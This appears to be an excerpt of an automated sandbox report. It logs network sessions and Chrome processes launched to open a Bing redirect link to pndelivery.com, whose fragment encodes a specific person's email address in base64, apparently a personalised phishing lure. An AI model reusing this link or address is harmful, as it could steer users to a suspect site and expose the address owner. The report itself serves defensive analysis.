        Date: Mon, 29 Apr 2024 08:30:02 GMT
        Content-Length: 55
        Connection: close
        X-CID: 2
        2024-04-29 08:30:02 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
        Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        4192.168.2.44974520.114.59.183443
        TimestampBytes transferredDirectionData
        2024-04-29 08:30:05 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=b44B1+h++z7PEvC&MD=rkzuDEOH HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
        Host: slscr.update.microsoft.com
        2024-04-29 08:30:05 UTC560INHTTP/1.1 200 OK
        Cache-Control: no-cache
        Pragma: no-cache
        Content-Type: application/octet-stream
        Expires: -1
        Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
        ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
        MS-CorrelationId: 1ea77257-3d2d-4784-b261-a2f508c8ae02
        MS-RequestId: 356f4648-ba21-4f3b-9bc8-c6211a248c7e
        MS-CV: IdyiHR9FHEWg3p1R.0
        X-Microsoft-SLSClientCache: 2880
        Content-Disposition: attachment; filename=environment.cab
        X-Content-Type-Options: nosniff
        Date: Mon, 29 Apr 2024 08:30:04 GMT
        Connection: close
        Content-Length: 24490
        2024-04-29 08:30:05 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
        Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
        2024-04-29 08:30:05 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
        Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        5192.168.2.44975135.190.80.14434600C:\Program Files\Google\Chrome\Application\chrome.exe
        TimestampBytes transferredDirectionData
        2024-04-29 08:30:07 UTC529OUTOPTIONS /report/v4?s=xHsZbEt%2BEQb8tkMtTf3b9d495RCkfyp%2BI3J1I8%2FUdUBlcjCQBo0Egs3hZgK%2FWhHrXH%2F8kr5vH1M%2B3MLQXOGO1rpXTvv8DFLd0PgyI84Q5Y4LTjC08PkFpIul3Q%3D%3D HTTP/1.1
        Host: a.nel.cloudflare.com
        Connection: keep-alive
        Origin: https://tgbt.xyz
        Access-Control-Request-Method: POST
        Access-Control-Request-Headers: content-type
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
        Accept-Encoding: gzip, deflate, br
        Accept-Language: en-US,en;q=0.9
        2024-04-29 08:30:08 UTC336INHTTP/1.1 200 OK
        content-length: 0
        access-control-max-age: 86400
        access-control-allow-methods: POST, OPTIONS
        access-control-allow-origin: *
        access-control-allow-headers: content-length, content-type
        date: Mon, 29 Apr 2024 08:30:07 GMT
        Via: 1.1 google
        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
        Connection: close


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        6192.168.2.44975235.190.80.14434600C:\Program Files\Google\Chrome\Application\chrome.exe
        TimestampBytes transferredDirectionData
        2024-04-29 08:30:09 UTC478OUTPOST /report/v4?s=xHsZbEt%2BEQb8tkMtTf3b9d495RCkfyp%2BI3J1I8%2FUdUBlcjCQBo0Egs3hZgK%2FWhHrXH%2F8kr5vH1M%2B3MLQXOGO1rpXTvv8DFLd0PgyI84Q5Y4LTjC08PkFpIul3Q%3D%3D HTTP/1.1
        Host: a.nel.cloudflare.com
        Connection: keep-alive
        Content-Length: 458
        Content-Type: application/reports+json
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
        Accept-Encoding: gzip, deflate, br
        Accept-Language: en-US,en;q=0.9
        2024-04-29 08:30:09 UTC458OUTData Raw: 5b 7b 22 61 67 65 22 3a 31 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 36 30 36 32 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 70 6e 64 65 6c 69 76 65 72 79 2e 63 6f 6d 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 32 31 38 2e 32 34 31 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 35 30 30 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a
        Data Ascii: [{"age":1,"body":{"elapsed_time":6062,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://pndelivery.com/","sampling_fraction":1.0,"server_ip":"172.67.218.241","status_code":500,"type":"http.error"},"type":"network-error","url":
        2024-04-29 08:30:09 UTC168INHTTP/1.1 200 OK
        content-length: 0
        date: Mon, 29 Apr 2024 08:30:09 GMT
        Via: 1.1 google
        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
        Connection: close


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        7192.168.2.44975320.114.59.183443
        TimestampBytes transferredDirectionData
        2024-04-29 08:30:42 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=b44B1+h++z7PEvC&MD=rkzuDEOH HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
        Host: slscr.update.microsoft.com
        2024-04-29 08:30:43 UTC560INHTTP/1.1 200 OK
        Cache-Control: no-cache
        Pragma: no-cache
        Content-Type: application/octet-stream
        Expires: -1
        Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
        ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160"
        MS-CorrelationId: 7d53a59f-7e09-4f67-953b-07c6ca8c0811
        MS-RequestId: f14dfa96-be82-4997-9697-e4209a1697e5
        MS-CV: 9tu6ILGMSk2plagB.0
        X-Microsoft-SLSClientCache: 2160
        Content-Disposition: attachment; filename=environment.cab
        X-Content-Type-Options: nosniff
        Date: Mon, 29 Apr 2024 08:30:42 GMT
        Connection: close
        Content-Length: 25457
        2024-04-29 08:30:43 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92
        Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
        2024-04-29 08:30:43 UTC9633INData Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a
        Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq


        Click to jump to process

        Click to jump to process

        Click to jump to process

        Target ID:0
        Start time:10:29:41
        Start date:29/04/2024
        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
        Wow64 process (32bit):false
        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
        Imagebase:0x7ff76e190000
        File size:3'242'272 bytes
        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:low
        Has exited:false

        Target ID:2
        Start time:10:29:48
        Start date:29/04/2024
        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
        Wow64 process (32bit):false
        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1996,i,5827511548068904742,14250865823903610832,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Imagebase:0x7ff76e190000
        File size:3'242'272 bytes
        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:low
        Has exited:false

        Target ID:3
        Start time:10:29:51
        Start date:29/04/2024
        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
        Wow64 process (32bit):false
        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.bing.com/ck/a?!&&p=e0aa5e56e0123c0aJmltdHM9MTcxMzkxNjgwMCZpZ3VpZD0zMzUxYmMyZS03MTZhLTZmNjUtM2IyNC1hODRlNzA1MDZlMmYmaW5zaWQ9NTMxMQ&ptn=3&ver=2&hsh=3&fclid=3351bc2e-716a-6f65-3b24-a84e70506e2f&u=a1aHR0cHM6Ly9wbmRlbGl2ZXJ5LmNvbS9wcm9kdWN0L2dyYW5kbWFzLWJlcnJ5LW11ZmZpbnMv#Y3J5c3RhbC5zaGlAY24uYXRzLm5ldA=="
        Imagebase:0x7ff76e190000
        File size:3'242'272 bytes
        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:low
        Has exited:true

        No disassembly